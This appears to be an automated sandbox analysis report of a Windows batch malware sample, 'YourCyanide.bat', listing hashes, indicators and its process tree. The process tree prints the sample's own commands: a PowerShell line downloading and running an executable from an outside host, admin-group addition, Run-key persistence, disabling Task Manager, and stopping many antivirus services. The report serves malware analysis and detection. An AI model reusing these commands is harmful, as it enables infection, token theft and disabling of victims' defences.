Analysis
-
max time kernel
433s -
max time network
435s -
platform
windows7_x64 -
resource
win7-20220414-en -
submitted
22-05-2022 23:26
Static task
static1
Behavioral task
behavioral1
Sample
YourCyanide.bat
Resource
win7-20220414-en
Behavioral task
behavioral2
Sample
YourCyanide.bat
Resource
win10v2004-20220414-en
Behavioral task
behavioral3
Sample
YourCyanide.bat
Resource
win11-20220223-en
General
-
Target
YourCyanide.bat
-
Size
150KB
-
MD5
fdd17cbaa7423d1c9ca1ffb376d30b36
-
SHA1
47986c795d7a2521408f4f63a6b068c054659bc7
-
SHA256
6d4eafaeac05daa575d551127bffc77e92fae88887c3168318fe50dc26b8d725
-
SHA512
3aa57c435f462bea43ba87d527603ceabedff24c1353e64dc9b6e2c89956d2216030030e14056095afb4db17eb44f6f33dbed95054d5852cd9a4eccb5d6088cf
Malware Config
Extracted
https://cdn.discordapp.com/attachments/974798125011198003/976894591552860220/NoKeyB.exe
Extracted
https://cdn.discordapp.com/attachments/974798125011198003/976939955140038656/GetToken.exe
Extracted
C:\Users\Admin\Desktop\YcynNote.txt
yourcyanide.help@gmail.com
Signatures
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exepowershell.exeflow pid process 4 912 powershell.exe 6 580 powershell.exe -
Disables Task Manager via registry modification
-
Downloads MZ/PE file
-
Executes dropped EXE 2 IoCs
Processes:
NoKeyB.exeGetToken.exepid process 2016 NoKeyB.exe 1632 GetToken.exe -
Modifies Windows Firewall 1 TTPs
-
Loads dropped DLL 1 IoCs
Processes:
cmd.exepid process 948 cmd.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook profiles 1 TTPs 5 IoCs
Processes:
OUTLOOK.EXEdescription ioc process Key queried \REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 OUTLOOK.EXE Key opened \REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook OUTLOOK.EXE Key created \REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook OUTLOOK.EXE Key queried \REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook OUTLOOK.EXE Key created \REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 OUTLOOK.EXE -
Adds Run key to start application 2 TTPs 2 IoCs
Processes:
reg.exedescription ioc process Key created \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Run reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\rundll32_25967_toolbar = "C:\\Users\\Admin\\AppData\\Local\\Temp\\YourCyanide.bat" reg.exe -
Enumerates connected drives 3 TTPs 24 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
cmd.exedescription ioc process File opened (read-only) \??\A: cmd.exe File opened (read-only) \??\I: cmd.exe File opened (read-only) \??\M: cmd.exe File opened (read-only) \??\T: cmd.exe File opened (read-only) \??\Y: cmd.exe File opened (read-only) \??\B: cmd.exe File opened (read-only) \??\E: cmd.exe File opened (read-only) \??\Q: cmd.exe File opened (read-only) \??\S: cmd.exe File opened (read-only) \??\W: cmd.exe File opened (read-only) \??\Z: cmd.exe File opened (read-only) \??\H: cmd.exe File opened (read-only) \??\K: cmd.exe File opened (read-only) \??\L: cmd.exe File opened (read-only) \??\P: cmd.exe File opened (read-only) \??\F: cmd.exe File opened (read-only) \??\G: cmd.exe File opened (read-only) \??\J: cmd.exe File opened (read-only) \??\N: cmd.exe File opened (read-only) \??\O: cmd.exe File opened (read-only) \??\R: cmd.exe File opened (read-only) \??\U: cmd.exe File opened (read-only) \??\V: cmd.exe File opened (read-only) \??\X: cmd.exe -
Drops file in System32 directory 14 IoCs
Processes:
OUTLOOK.EXEdescription ioc process File opened for modification C:\Windows\SysWOW64\PerfStringBackup.INI OUTLOOK.EXE File created C:\Windows\system32\perfc007.dat OUTLOOK.EXE File created C:\Windows\system32\perfc009.dat OUTLOOK.EXE File created C:\Windows\system32\perfc00C.dat OUTLOOK.EXE File created C:\Windows\system32\perfc010.dat OUTLOOK.EXE File created C:\Windows\system32\perfh010.dat OUTLOOK.EXE File created C:\Windows\system32\perfc011.dat OUTLOOK.EXE File created C:\Windows\SysWOW64\PerfStringBackup.TMP OUTLOOK.EXE File created C:\Windows\system32\perfh009.dat OUTLOOK.EXE File created C:\Windows\system32\perfh00A.dat OUTLOOK.EXE File created C:\Windows\system32\perfh00C.dat OUTLOOK.EXE File created C:\Windows\system32\perfh007.dat OUTLOOK.EXE File created C:\Windows\system32\perfc00A.dat OUTLOOK.EXE File created C:\Windows\system32\perfh011.dat OUTLOOK.EXE -
Drops file in Windows directory 5 IoCs
Processes:
cmd.exeOUTLOOK.EXEdescription ioc process File opened for modification C:\Windows\win.ini cmd.exe File opened for modification C:\Windows\system.ini cmd.exe File created C:\Windows\inf\Outlook\outlperf.h OUTLOOK.EXE File opened for modification C:\Windows\inf\Outlook\outlperf.h OUTLOOK.EXE File created C:\Windows\inf\Outlook\0009\outlperf.ini OUTLOOK.EXE -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Enumerates processes with tasklist 1 TTPs 1 IoCs
-
Processes:
OUTLOOK.EXEdescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes" OUTLOOK.EXE Key created \REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\Software\Microsoft\Internet Explorer\Toolbar OUTLOOK.EXE Key created \REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\Software\Microsoft\Internet Explorer\MenuExt OUTLOOK.EXE Key created \REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote OUTLOOK.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105" OUTLOOK.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55" OUTLOOK.EXE Key created \REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel OUTLOOK.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000" OUTLOOK.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1" OUTLOOK.EXE -
Modifies registry class 64 IoCs
Processes:
OUTLOOK.EXEdescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{00067368-0000-0000-C000-000000000046}\TypeLib\ = "{00062FFF-0000-0000-C000-000000000046}" OUTLOOK.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0006309A-0000-0000-C000-000000000046}\TypeLib\Version = "9.4" OUTLOOK.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0006309C-0000-0000-C000-000000000046}\TypeLib OUTLOOK.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{00063037-0000-0000-C000-000000000046}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" OUTLOOK.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000672F8-0000-0000-C000-000000000046}\TypeLib OUTLOOK.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{00063001-0000-0000-C000-000000000046}\TypeLib\Version = "9.4" OUTLOOK.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000630D1-0000-0000-C000-000000000046}\TypeLib\Version = "9.4" OUTLOOK.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000630D8-0000-0000-C000-000000000046} OUTLOOK.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000630A8-0000-0000-C000-000000000046}\TypeLib\ = "{00062FFF-0000-0000-C000-000000000046}" OUTLOOK.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000630C3-0000-0000-C000-000000000046}\TypeLib OUTLOOK.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{00063075-0000-0000-C000-000000000046}\TypeLib\ = "{00062FFF-0000-0000-C000-000000000046}" OUTLOOK.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000672DC-0000-0000-C000-000000000046}\TypeLib OUTLOOK.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0006302D-0000-0000-C000-000000000046} OUTLOOK.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000630C7-0000-0000-C000-000000000046}\TypeLib\ = "{00062FFF-0000-0000-C000-000000000046}" OUTLOOK.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000630DE-0000-0000-C000-000000000046}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" OUTLOOK.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000630E2-0000-0000-C000-000000000046}\ProxyStubClsid32 OUTLOOK.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0006307B-0000-0000-C000-000000000046}\ProxyStubClsid32\ = "{00020420-0000-0000-C000-000000000046}" OUTLOOK.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000630EA-0000-0000-C000-000000000046}\ = "_CalendarModule" OUTLOOK.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000630EE-0000-0000-C000-000000000046}\TypeLib OUTLOOK.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{D87E7E17-6897-11CE-A6C0-00AA00608FAA}\ProxyStubClsid32 OUTLOOK.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000672DA-0000-0000-C000-000000000046}\TypeLib\Version = "9.4" OUTLOOK.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000672DF-0000-0000-C000-000000000046}\ProxyStubClsid32 OUTLOOK.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{00063001-0000-0000-C000-000000000046}\ProxyStubClsid32 OUTLOOK.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{00063045-0000-0000-C000-000000000046}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" OUTLOOK.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{00063006-0000-0000-C000-000000000046}\ProxyStubClsid32 OUTLOOK.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000630E3-0000-0000-C000-000000000046}\TypeLib\Version = "9.4" OUTLOOK.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000630F3-0000-0000-C000-000000000046} OUTLOOK.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0006F026-0000-0000-C000-000000000046}\ = "_DDocSiteControl" OUTLOOK.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000630FD-0000-0000-C000-000000000046}\TypeLib\Version = "9.4" OUTLOOK.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000630C5-0000-0000-C000-000000000046}\TypeLib\Version = "9.4" OUTLOOK.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000630DA-0000-0000-C000-000000000046}\TypeLib OUTLOOK.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{00063089-0000-0000-C000-000000000046}\TypeLib\Version = "9.4" OUTLOOK.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000630F0-0000-0000-C000-000000000046} OUTLOOK.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000630F1-0000-0000-C000-000000000046}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" OUTLOOK.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{00063103-0000-0000-C000-000000000046}\ProxyStubClsid32 OUTLOOK.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000630CF-0000-0000-C000-000000000046} OUTLOOK.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000630E1-0000-0000-C000-000000000046} OUTLOOK.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{00063102-0000-0000-C000-000000000046}\TypeLib\ = "{00062FFF-0000-0000-C000-000000000046}" OUTLOOK.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0006309D-0000-0000-C000-000000000046}\TypeLib\Version = "9.4" OUTLOOK.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0006309C-0000-0000-C000-000000000046}\ = "_TimelineView" OUTLOOK.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000630FF-0000-0000-C000-000000000046}\TypeLib\ = "{00062FFF-0000-0000-C000-000000000046}" OUTLOOK.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{50BB9B50-811D-11CE-B565-00AA00608FAA} OUTLOOK.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000630E8-0000-0000-C000-000000000046}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" OUTLOOK.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0006300F-0000-0000-C000-000000000046}\TypeLib\Version = "9.4" OUTLOOK.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0006309B-0000-0000-C000-000000000046} OUTLOOK.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000630FF-0000-0000-C000-000000000046}\TypeLib OUTLOOK.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{00063038-0000-0000-C000-000000000046}\TypeLib\ = "{00062FFF-0000-0000-C000-000000000046}" OUTLOOK.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0006304B-0000-0000-C000-000000000046}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" OUTLOOK.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{00063049-0000-0000-C000-000000000046}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" OUTLOOK.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000630C9-0000-0000-C000-000000000046}\ = "_ExchangeUser" OUTLOOK.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0006307A-0000-0000-C000-000000000046}\TypeLib OUTLOOK.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000630FE-0000-0000-C000-000000000046}\TypeLib\ = "{00062FFF-0000-0000-C000-000000000046}" OUTLOOK.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{00063107-0000-0000-C000-000000000046}\TypeLib OUTLOOK.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{00063043-0000-0000-C000-000000000046}\ = "Action" OUTLOOK.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0006303C-0000-0000-C000-000000000046} OUTLOOK.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{00063042-0000-0000-C000-000000000046} OUTLOOK.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{00063042-0000-0000-C000-000000000046}\TypeLib OUTLOOK.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{00063102-0000-0000-C000-000000000046} OUTLOOK.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0006309D-0000-0000-C000-000000000046} OUTLOOK.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0006305A-0000-0000-C000-000000000046}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" OUTLOOK.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{00063040-0000-0000-C000-000000000046}\TypeLib OUTLOOK.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000630D3-0000-0000-C000-000000000046}\TypeLib\Version = "9.4" OUTLOOK.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000630E1-0000-0000-C000-000000000046}\ProxyStubClsid32 OUTLOOK.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{00063101-0000-0000-C000-000000000046}\TypeLib\Version = "9.4" OUTLOOK.EXE -
NTFS ADS 2 IoCs
Processes:
cmd.exedescription ioc process File opened for modification C:\Users\Admin\Documents\%c¼├XV:~30 cmd.exe File opened for modification C:\Users\Admin\Desktop\%c¼├XV:~23 cmd.exe -
Runs net.exe
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
OUTLOOK.EXEpid process 1488 OUTLOOK.EXE -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
Processes:
GetToken.exepid process 1632 GetToken.exe -
Suspicious behavior: EnumeratesProcesses 9 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 912 powershell.exe 1812 powershell.exe 1812 powershell.exe 580 powershell.exe 1324 powershell.exe 1736 powershell.exe 1716 powershell.exe 1532 powershell.exe 1632 powershell.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
OUTLOOK.EXEpid process 1488 OUTLOOK.EXE -
Suspicious use of AdjustPrivilegeToken 9 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exetasklist.exepowershell.exedescription pid process Token: SeDebugPrivilege 912 powershell.exe Token: SeDebugPrivilege 1812 powershell.exe Token: SeDebugPrivilege 580 powershell.exe Token: SeDebugPrivilege 1324 powershell.exe Token: SeDebugPrivilege 1736 powershell.exe Token: SeDebugPrivilege 1716 powershell.exe Token: SeDebugPrivilege 1532 powershell.exe Token: SeDebugPrivilege 1696 tasklist.exe Token: SeDebugPrivilege 1632 powershell.exe -
Suspicious use of FindShellTrayWindow 4 IoCs
Processes:
NoKeyB.exeOUTLOOK.EXEpid process 2016 NoKeyB.exe 1488 OUTLOOK.EXE 1488 OUTLOOK.EXE 1488 OUTLOOK.EXE -
Suspicious use of SendNotifyMessage 3 IoCs
Processes:
NoKeyB.exeOUTLOOK.EXEpid process 2016 NoKeyB.exe 1488 OUTLOOK.EXE 1488 OUTLOOK.EXE -
Suspicious use of SetWindowsHookEx 3 IoCs
Processes:
NoKeyB.exeOUTLOOK.EXEpowershell.exepid process 2016 NoKeyB.exe 1488 OUTLOOK.EXE 1632 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
cmd.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exedescription pid process target process PID 948 wrote to memory of 1528 948 cmd.exe attrib.exe PID 948 wrote to memory of 1528 948 cmd.exe attrib.exe PID 948 wrote to memory of 1528 948 cmd.exe attrib.exe PID 948 wrote to memory of 964 948 cmd.exe rundll32.exe PID 948 wrote to memory of 964 948 cmd.exe rundll32.exe PID 948 wrote to memory of 964 948 cmd.exe rundll32.exe PID 948 wrote to memory of 912 948 cmd.exe powershell.exe PID 948 wrote to memory of 912 948 cmd.exe powershell.exe PID 948 wrote to memory of 912 948 cmd.exe powershell.exe PID 948 wrote to memory of 2016 948 cmd.exe NoKeyB.exe PID 948 wrote to memory of 2016 948 cmd.exe NoKeyB.exe PID 948 wrote to memory of 2016 948 cmd.exe NoKeyB.exe PID 948 wrote to memory of 1812 948 cmd.exe powershell.exe PID 948 wrote to memory of 1812 948 cmd.exe powershell.exe PID 948 wrote to memory of 1812 948 cmd.exe powershell.exe PID 948 wrote to memory of 1880 948 cmd.exe net.exe PID 948 wrote to memory of 1880 948 cmd.exe net.exe PID 948 wrote to memory of 1880 948 cmd.exe net.exe PID 1880 wrote to memory of 612 1880 net.exe net1.exe PID 1880 wrote to memory of 612 1880 net.exe net1.exe PID 1880 wrote to memory of 612 1880 net.exe net1.exe PID 948 wrote to memory of 1512 948 cmd.exe reg.exe PID 948 wrote to memory of 1512 948 cmd.exe reg.exe PID 948 wrote to memory of 1512 948 cmd.exe reg.exe PID 948 wrote to memory of 1308 948 cmd.exe reg.exe PID 948 wrote to memory of 1308 948 cmd.exe reg.exe PID 948 wrote to memory of 1308 948 cmd.exe reg.exe PID 948 wrote to memory of 840 948 cmd.exe net.exe PID 948 wrote to memory of 840 948 cmd.exe net.exe PID 948 wrote to memory of 840 948 cmd.exe net.exe PID 840 wrote to memory of 1548 840 net.exe net1.exe PID 840 wrote to memory of 1548 840 net.exe net1.exe PID 840 wrote to memory of 1548 840 net.exe net1.exe PID 948 wrote to memory of 576 948 cmd.exe net.exe PID 948 wrote to memory of 576 948 cmd.exe net.exe PID 948 wrote to memory of 576 948 cmd.exe net.exe PID 576 wrote to memory of 1624 576 net.exe net1.exe PID 576 wrote to memory of 1624 576 net.exe net1.exe PID 576 wrote to memory of 1624 576 net.exe net1.exe PID 948 wrote to memory of 1740 948 cmd.exe net.exe PID 948 wrote to memory of 1740 948 cmd.exe net.exe PID 948 wrote to memory of 1740 948 cmd.exe net.exe PID 1740 wrote to memory of 1116 1740 net.exe net1.exe PID 1740 wrote to memory of 1116 1740 net.exe net1.exe PID 1740 wrote to memory of 1116 1740 net.exe net1.exe PID 948 wrote to memory of 1884 948 cmd.exe net.exe PID 948 wrote to memory of 1884 948 cmd.exe net.exe PID 948 wrote to memory of 1884 948 cmd.exe net.exe PID 1884 wrote to memory of 1072 1884 net.exe net1.exe PID 1884 wrote to memory of 1072 1884 net.exe net1.exe PID 1884 wrote to memory of 1072 1884 net.exe net1.exe PID 948 wrote to memory of 832 948 cmd.exe net.exe PID 948 wrote to memory of 832 948 cmd.exe net.exe PID 948 wrote to memory of 832 948 cmd.exe net.exe PID 832 wrote to memory of 1180 832 net.exe net1.exe PID 832 wrote to memory of 1180 832 net.exe net1.exe PID 832 wrote to memory of 1180 832 net.exe net1.exe PID 948 wrote to memory of 1064 948 cmd.exe net.exe PID 948 wrote to memory of 1064 948 cmd.exe net.exe PID 948 wrote to memory of 1064 948 cmd.exe net.exe PID 1064 wrote to memory of 1584 1064 net.exe net1.exe PID 1064 wrote to memory of 1584 1064 net.exe net1.exe PID 1064 wrote to memory of 1584 1064 net.exe net1.exe PID 948 wrote to memory of 1900 948 cmd.exe net.exe -
Views/modifies file attributes 1 TTPs 1 IoCs
-
outlook_win_path 1 IoCs
Processes:
OUTLOOK.EXEdescription ioc process Key queried \REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook OUTLOOK.EXE
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\YourCyanide.bat"1⤵
- Loads dropped DLL
- Enumerates connected drives
- Drops file in Windows directory
- NTFS ADS
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\attrib.exeattrib +h +s C:\Users\Admin\AppData\Local\Temp\YourCyanide.bat2⤵
- Views/modifies file attributes
-
C:\Windows\system32\rundll32.exeRUNDLL32 USER32.DLL SwapMouseButton2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/974798125011198003/976894591552860220/NoKeyB.exe', 'NoKeyB.exe')"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Documents\NoKeyB.exeNoKeyB.exe2⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "Set-ExecutionPolicy Unrestricted"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\net.exenet localgroup administrators session /ADD2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup administrators session /ADD3⤵
-
C:\Windows\system32\reg.exereg add "hklm\Software\Microsoft\Windows\CurrentVersion\Run" /v "rundll32_25967_toolbar" /t "REG_SZ" /d C:\Users\Admin\AppData\Local\Temp\YourCyanide.bat /f2⤵
- Adds Run key to start application
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_SZ /d 1 /f2⤵
-
C:\Windows\system32\net.exenet stop "Security Center" /y2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Security Center" /y3⤵
-
C:\Windows\system32\net.exenet stop "Automatic Updates" /y2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Automatic Updates" /y3⤵
-
C:\Windows\system32\net.exenet stop "Symantec Core LC" /y2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Symantec Core LC" /y3⤵
-
C:\Windows\system32\net.exenet stop "SAVScan" /y2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SAVScan" /y3⤵
-
C:\Windows\system32\net.exenet stop "norton AntiVirus Firewall Monitor Service" /y2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "norton AntiVirus Firewall Monitor Service" /y3⤵
-
C:\Windows\system32\net.exenet stop "norton AntiVirus Auto-Protect Service" /y2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "norton AntiVirus Auto-Protect Service" /y3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop spoolnt3⤵
-
C:\Windows\system32\net.exenet stop "norton AntiVirus Auto Protect Service" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "norton AntiVirus Auto Protect Service" /y3⤵
-
C:\Windows\system32\net.exenet stop "McAfee Spamkiller Server" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "McAfee Spamkiller Server" /y3⤵
-
C:\Windows\system32\net.exenet stop "McAfee Personal Firewall Service" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "McAfee Personal Firewall Service" /y3⤵
-
C:\Windows\system32\net.exenet stop "McAfee SecurityCenter Update Manager" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "McAfee SecurityCenter Update Manager" /y3⤵
-
C:\Windows\system32\net.exenet stop "Symantec SPBBCSvc" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Symantec SPBBCSvc" /y3⤵
-
C:\Windows\system32\net.exenet stop "Ahnlab Task Scheduler" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Ahnlab Task Scheduler" /y3⤵
-
C:\Windows\system32\net.exenet stop navapsvc /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop navapsvc /y3⤵
-
C:\Windows\system32\net.exenet stop "Sygate Personal Firewall Pro" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sygate Personal Firewall Pro" /y3⤵
-
C:\Windows\system32\net.exenet stop vrmonsvc /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop vrmonsvc /y3⤵
-
C:\Windows\system32\net.exenet stop MonSvcNT /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MonSvcNT /y3⤵
-
C:\Windows\system32\net.exenet stop SAVScan /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SAVScan /y3⤵
-
C:\Windows\system32\net.exenet stop NProtectService /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop NProtectService /y3⤵
-
C:\Windows\system32\net.exenet stop ccSetMGR /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ccSetMGR /y3⤵
-
C:\Windows\system32\net.exenet stop ccEvtMGR /y2⤵
-
